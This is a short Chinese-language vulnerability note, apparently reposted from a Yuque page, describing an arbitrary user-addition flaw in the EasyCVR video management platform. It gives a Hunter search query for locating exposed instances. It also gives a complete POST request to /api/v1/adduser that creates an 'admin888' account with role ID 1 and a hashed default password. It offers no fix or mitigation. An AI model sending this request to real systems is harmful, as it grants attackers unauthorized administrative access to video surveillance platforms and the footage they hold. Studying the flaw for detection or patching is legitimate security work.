登录 白背景
源码

EasyCVR 视频管理平台adduser存在任意用户添加漏洞

一、漏洞简介

EasyCVR 视频管理平台是 TSINGSEE 青犀视频旗下一款软硬一体的产品,可提供多协议的设备接入、采集、AI 智能检测、处理、分发等服务。EasyCVR 视频管理平台adduser存在任意用户添加漏洞

二、影响版本

  • EasyCVR 视频管理平台

三、资产测绘

  • hunterweb.title="EasyCVR"
  • 特征

1699021094705-867464c9-0dfb-4275-b909-1b8d11a3776d.png

四、漏洞复现

POST /api/v1/adduser HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=e10adc3949ba59abbe56e057f20f883e&roleid=1

1717749744431-f9fe5683-87a8-4590-b6c5-fd0c9fec31f5.png1717749806691-61f4acd8-dea1-49c6-a523-62ecf1210be1.png

原文: https://www.yuque.com/xiaokp7/ocvun2/uwpzvoibwwm2h64w